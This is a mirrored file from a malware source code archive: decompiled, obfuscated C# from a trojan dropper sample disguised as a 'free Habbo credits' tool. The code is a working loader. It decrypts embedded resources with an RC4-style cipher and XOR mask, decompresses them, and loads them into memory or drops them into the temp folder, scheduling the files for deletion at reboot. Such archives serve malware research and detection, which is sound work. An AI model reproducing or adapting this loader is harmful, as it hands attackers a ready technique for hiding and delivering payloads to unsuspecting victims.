mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
442 lines
11 KiB
C#
442 lines
11 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: qzqFreeHabboCredits, Version=924.8446.573.2307, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: C68363C3-90B9-4B41-B73E-69250BBF6D04
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.avku-a7f57d7af3f5f2eee9dce73783919f24275306ba8511b766b4e534e54464adb8.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.IO;
|
|||
|
using System.IO.Compression;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
internal static class \u000E
|
|||
|
{
|
|||
|
internal static void \u0002() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u000E.\u0002);
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static Assembly \u0002(object _param0, ResolveEventArgs _param1)
|
|||
|
{
|
|||
|
string str1 = new \u000E.\u0002(_param1.Name).\u0002(false);
|
|||
|
if (true)
|
|||
|
goto label_38;
|
|||
|
label_1:
|
|||
|
string s1;
|
|||
|
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s1));
|
|||
|
if (true)
|
|||
|
goto label_39;
|
|||
|
label_2:
|
|||
|
string str2 = \u000F.\u0002(570044744);
|
|||
|
if (true)
|
|||
|
goto label_40;
|
|||
|
label_3:
|
|||
|
string str3;
|
|||
|
string str4 = str3;
|
|||
|
char[] chArray1 = new char[1];
|
|||
|
if (true)
|
|||
|
goto label_41;
|
|||
|
label_4:
|
|||
|
char[] chArray2;
|
|||
|
chArray2[0] = ',';
|
|||
|
char[] chArray3 = chArray2;
|
|||
|
string[] strArray1 = str4.Split(chArray3);
|
|||
|
if (true)
|
|||
|
goto label_42;
|
|||
|
label_5:
|
|||
|
if (true)
|
|||
|
goto label_43;
|
|||
|
label_6:
|
|||
|
if (true)
|
|||
|
goto label_44;
|
|||
|
label_7:
|
|||
|
if (true)
|
|||
|
goto label_45;
|
|||
|
label_8:
|
|||
|
string str5 = (string) null;
|
|||
|
string s2 = (string) null;
|
|||
|
string[] strArray2;
|
|||
|
string str6;
|
|||
|
bool flag1;
|
|||
|
bool flag2;
|
|||
|
bool flag3;
|
|||
|
for (int index = 0; index < strArray2.Length; index += 3)
|
|||
|
{
|
|||
|
if (strArray2[index].Equals(str6, StringComparison.Ordinal))
|
|||
|
{
|
|||
|
str5 = strArray2[index + 1];
|
|||
|
s2 = strArray2[index + 2];
|
|||
|
int length = str5.IndexOf('|');
|
|||
|
if (length >= 0)
|
|||
|
{
|
|||
|
string str7 = str5.Substring(0, length);
|
|||
|
str5 = str5.Substring(length + 1);
|
|||
|
flag1 = str7.IndexOf('a') != -1;
|
|||
|
flag2 = str7.IndexOf('b') != -1;
|
|||
|
flag3 = str7.IndexOf('c') != -1;
|
|||
|
break;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
if (str5 == null)
|
|||
|
return (Assembly) null;
|
|||
|
Dictionary<string, Assembly> dictionary = \u000E.\u0003.\u0002;
|
|||
|
Assembly assembly;
|
|||
|
lock (dictionary)
|
|||
|
{
|
|||
|
if (!dictionary.TryGetValue(str5, out assembly))
|
|||
|
{
|
|||
|
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str5);
|
|||
|
if (manifestResourceStream == null)
|
|||
|
return (Assembly) null;
|
|||
|
int length1 = (int) manifestResourceStream.Length;
|
|||
|
byte[] numArray = new byte[length1];
|
|||
|
manifestResourceStream.Read(numArray, 0, length1);
|
|||
|
manifestResourceStream.Dispose();
|
|||
|
if (flag1)
|
|||
|
numArray = \u000E.\u0003(numArray);
|
|||
|
if (flag2)
|
|||
|
numArray = \u000E.\u0002(numArray);
|
|||
|
int length2 = numArray.Length;
|
|||
|
byte[] bytes = Convert.FromBase64String(s2);
|
|||
|
string path2 = Encoding.UTF8.GetString(bytes, 0, bytes.Length);
|
|||
|
if (!flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
assembly = Assembly.Load(numArray);
|
|||
|
}
|
|||
|
catch (FileLoadException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
catch (BadImageFormatException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
}
|
|||
|
if (flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str8 = Path.Combine(Path.GetTempPath(), str5);
|
|||
|
Directory.CreateDirectory(str8);
|
|||
|
string str9 = Path.Combine(str8, path2);
|
|||
|
if (!File.Exists(str9))
|
|||
|
{
|
|||
|
Stream stream = (Stream) File.Create(str9);
|
|||
|
stream.Write(numArray, 0, length2);
|
|||
|
stream.Dispose();
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0002(str9, (string) null, 4);
|
|||
|
\u000E.\u0002(str8, (string) null, 4);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
assembly = Assembly.LoadFrom(str9);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
dictionary.Add(str5, assembly);
|
|||
|
}
|
|||
|
}
|
|||
|
return assembly;
|
|||
|
label_45:
|
|||
|
flag3 = false;
|
|||
|
goto label_8;
|
|||
|
label_44:
|
|||
|
flag2 = false;
|
|||
|
goto label_7;
|
|||
|
label_43:
|
|||
|
flag1 = false;
|
|||
|
goto label_6;
|
|||
|
label_42:
|
|||
|
strArray2 = strArray1;
|
|||
|
goto label_5;
|
|||
|
label_41:
|
|||
|
chArray2 = chArray1;
|
|||
|
goto label_4;
|
|||
|
label_40:
|
|||
|
str3 = str2;
|
|||
|
goto label_3;
|
|||
|
label_39:
|
|||
|
str6 = base64String;
|
|||
|
goto label_2;
|
|||
|
label_38:
|
|||
|
s1 = str1;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
private static int \u0002(byte[] _param0, int _param1)
|
|||
|
{
|
|||
|
byte[] numArray = _param0;
|
|||
|
if (true)
|
|||
|
;
|
|||
|
int index = _param1;
|
|||
|
return (int) numArray[index] | (int) _param0[_param1 + 1] << 24 | (int) _param0[_param1 + 2] << 8 | (int) _param0[_param1 + 3] << 16;
|
|||
|
}
|
|||
|
|
|||
|
private static byte[] \u0002(byte[] _param0)
|
|||
|
{
|
|||
|
int num1 = \u000E.\u0002(_param0, 0);
|
|||
|
if (true)
|
|||
|
goto label_6;
|
|||
|
label_1:
|
|||
|
int num2;
|
|||
|
if (num2 != -1686991929)
|
|||
|
throw new Exception();
|
|||
|
int num3 = \u000E.\u0002(_param0, 4);
|
|||
|
if (true)
|
|||
|
goto label_7;
|
|||
|
label_4:
|
|||
|
MemoryStream memoryStream = new MemoryStream(_param0, false);
|
|||
|
if (true)
|
|||
|
goto label_8;
|
|||
|
label_5:
|
|||
|
Stream stream1;
|
|||
|
stream1.Position = 8L;
|
|||
|
Stream stream2 = (Stream) new DeflateStream(stream1, CompressionMode.Decompress);
|
|||
|
int count;
|
|||
|
_param0 = new byte[count];
|
|||
|
stream2.Read(_param0, 0, count);
|
|||
|
return _param0;
|
|||
|
label_8:
|
|||
|
stream1 = (Stream) memoryStream;
|
|||
|
goto label_5;
|
|||
|
label_7:
|
|||
|
count = num3;
|
|||
|
goto label_4;
|
|||
|
label_6:
|
|||
|
num2 = num1;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static byte[] \u0003(byte[] _param0)
|
|||
|
{
|
|||
|
string str = \u000F.\u0002(570044816);
|
|||
|
if (true)
|
|||
|
goto label_11;
|
|||
|
label_1:
|
|||
|
string s;
|
|||
|
byte[] numArray1 = Convert.FromBase64String(s);
|
|||
|
if (true)
|
|||
|
goto label_12;
|
|||
|
label_2:
|
|||
|
byte[] numArray2;
|
|||
|
\u0003\u2000.\u0002(numArray2);
|
|||
|
\u000E.\u0005 obj1 = new \u000E.\u0005(numArray2);
|
|||
|
if (true)
|
|||
|
goto label_13;
|
|||
|
label_3:
|
|||
|
int length = _param0.Length;
|
|||
|
byte num1 = 0;
|
|||
|
byte num2 = 121;
|
|||
|
byte[] numArray3 = new byte[8]
|
|||
|
{
|
|||
|
(byte) 148,
|
|||
|
(byte) 68,
|
|||
|
(byte) 208,
|
|||
|
(byte) 52,
|
|||
|
(byte) 241,
|
|||
|
(byte) 93,
|
|||
|
(byte) 195,
|
|||
|
(byte) 220
|
|||
|
};
|
|||
|
\u000E.\u0005 obj2;
|
|||
|
for (int index = 0; index != length; ++index)
|
|||
|
{
|
|||
|
if (num1 == (byte) 0)
|
|||
|
num2 = obj2.\u0002();
|
|||
|
++num1;
|
|||
|
if (num1 == (byte) 32)
|
|||
|
num1 = (byte) 0;
|
|||
|
_param0[index] ^= (byte) ((uint) num2 ^ (uint) numArray3[index >> 2 & 3] ^ (uint) numArray3[(int) num1 & 3]);
|
|||
|
}
|
|||
|
return _param0;
|
|||
|
label_13:
|
|||
|
obj2 = obj1;
|
|||
|
goto label_3;
|
|||
|
label_12:
|
|||
|
numArray2 = numArray1;
|
|||
|
goto label_2;
|
|||
|
label_11:
|
|||
|
s = str;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
|
|||
|
private static extern bool \u0002(string _param0, string _param1, int _param2);
|
|||
|
|
|||
|
private struct \u0002
|
|||
|
{
|
|||
|
public Version \u0002;
|
|||
|
public string \u0003;
|
|||
|
public string \u0005;
|
|||
|
public string \u0008;
|
|||
|
|
|||
|
public \u0002(string _param1)
|
|||
|
{
|
|||
|
Version version = new Version();
|
|||
|
if (true)
|
|||
|
goto label_15;
|
|||
|
label_1:
|
|||
|
string empty = string.Empty;
|
|||
|
if (true)
|
|||
|
goto label_16;
|
|||
|
label_2:
|
|||
|
if (true)
|
|||
|
goto label_17;
|
|||
|
label_3:
|
|||
|
this.\u0008 = (string) null;
|
|||
|
string str1 = _param1;
|
|||
|
char[] chArray = new char[1]{ ',' };
|
|||
|
foreach (string str2 in str1.Split(chArray))
|
|||
|
{
|
|||
|
string str3 = str2.Trim();
|
|||
|
if (str3.StartsWith(\u000F.\u0002(570044611), StringComparison.Ordinal))
|
|||
|
this.\u0002 = new Version(str3.Substring(\u000F.\u0002(570044611).Length));
|
|||
|
else if (str3.StartsWith(\u000F.\u0002(570044656), StringComparison.Ordinal))
|
|||
|
{
|
|||
|
this.\u0005 = str3.Substring(\u000F.\u0002(570044656).Length);
|
|||
|
if (this.\u0005 == \u000F.\u0002(570044641))
|
|||
|
this.\u0005 = (string) null;
|
|||
|
}
|
|||
|
else if (str3.StartsWith(\u000F.\u0002(570044567), StringComparison.Ordinal))
|
|||
|
{
|
|||
|
this.\u0008 = str3.Substring(\u000F.\u0002(570044567).Length);
|
|||
|
if (this.\u0008 == \u000F.\u0002(570044557))
|
|||
|
this.\u0008 = (string) null;
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0003 = str3;
|
|||
|
}
|
|||
|
return;
|
|||
|
label_17:
|
|||
|
this.\u0005 = (string) null;
|
|||
|
goto label_3;
|
|||
|
label_16:
|
|||
|
this.\u0003 = empty;
|
|||
|
goto label_2;
|
|||
|
label_15:
|
|||
|
this.\u0002 = version;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
public string \u0002(bool _param1)
|
|||
|
{
|
|||
|
StringBuilder stringBuilder1 = new StringBuilder();
|
|||
|
if (true)
|
|||
|
goto label_4;
|
|||
|
label_1:
|
|||
|
StringBuilder stringBuilder2;
|
|||
|
stringBuilder2.Append(this.\u0003);
|
|||
|
if (_param1)
|
|||
|
stringBuilder2.Append(\u000F.\u0002(570044598)).Append((object) this.\u0002);
|
|||
|
stringBuilder2.Append(\u000F.\u0002(570044577)).Append(this.\u0005 ?? \u000F.\u0002(570044641)).Append(\u000F.\u0002(570044752)).Append(this.\u0008 ?? \u000F.\u0002(570044557));
|
|||
|
return stringBuilder2.ToString();
|
|||
|
label_4:
|
|||
|
stringBuilder2 = stringBuilder1;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static class \u0003
|
|||
|
{
|
|||
|
internal static readonly Dictionary<string, Assembly> \u0002;
|
|||
|
|
|||
|
static \u0003()
|
|||
|
{
|
|||
|
Dictionary<string, Assembly> dictionary = new Dictionary<string, Assembly>((IEqualityComparer<string>) StringComparer.Ordinal);
|
|||
|
if (false)
|
|||
|
return;
|
|||
|
\u000E.\u0003.\u0002 = dictionary;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private sealed class \u0005
|
|||
|
{
|
|||
|
private byte[] \u0002;
|
|||
|
private int \u0003;
|
|||
|
private int \u0005;
|
|||
|
|
|||
|
public \u0005(byte[] _param1)
|
|||
|
{
|
|||
|
byte[] numArray = new byte[256];
|
|||
|
if (true)
|
|||
|
goto label_9;
|
|||
|
label_1:
|
|||
|
// ISSUE: explicit constructor call
|
|||
|
base.\u002Ector();
|
|||
|
int length = _param1.Length;
|
|||
|
if (true)
|
|||
|
goto label_10;
|
|||
|
label_2:
|
|||
|
if (true)
|
|||
|
goto label_11;
|
|||
|
label_5:
|
|||
|
for (; this.\u0003 < 256; ++this.\u0003)
|
|||
|
this.\u0002[this.\u0003] = (byte) this.\u0003;
|
|||
|
int num;
|
|||
|
for (this.\u0003 = this.\u0005 = 0; this.\u0003 < 256; ++this.\u0003)
|
|||
|
{
|
|||
|
this.\u0005 = this.\u0005 + (int) _param1[this.\u0003 % num] + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
|
|||
|
this.\u0002(this.\u0003, this.\u0005);
|
|||
|
}
|
|||
|
return;
|
|||
|
label_11:
|
|||
|
this.\u0003 = 0;
|
|||
|
goto label_5;
|
|||
|
label_10:
|
|||
|
num = length;
|
|||
|
goto label_2;
|
|||
|
label_9:
|
|||
|
this.\u0002 = numArray;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
private void \u0002(int _param1, int _param2)
|
|||
|
{
|
|||
|
int num1 = (int) this.\u0002[_param1];
|
|||
|
if (true)
|
|||
|
goto label_2;
|
|||
|
label_1:
|
|||
|
this.\u0002[_param1] = this.\u0002[_param2];
|
|||
|
byte num2;
|
|||
|
this.\u0002[_param2] = num2;
|
|||
|
return;
|
|||
|
label_2:
|
|||
|
num2 = (byte) num1;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
|
|||
|
public byte \u0002()
|
|||
|
{
|
|||
|
int num1 = this.\u0003 + 1 & (int) byte.MaxValue;
|
|||
|
if (true)
|
|||
|
goto label_3;
|
|||
|
label_1:
|
|||
|
int num2 = this.\u0005 + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
|
|||
|
if (true)
|
|||
|
goto label_4;
|
|||
|
label_2:
|
|||
|
this.\u0002(this.\u0003, this.\u0005);
|
|||
|
return this.\u0002[(int) (byte) ((uint) this.\u0002[this.\u0003] + (uint) this.\u0002[this.\u0005])];
|
|||
|
label_4:
|
|||
|
this.\u0005 = num2;
|
|||
|
goto label_2;
|
|||
|
label_3:
|
|||
|
this.\u0003 = num1;
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|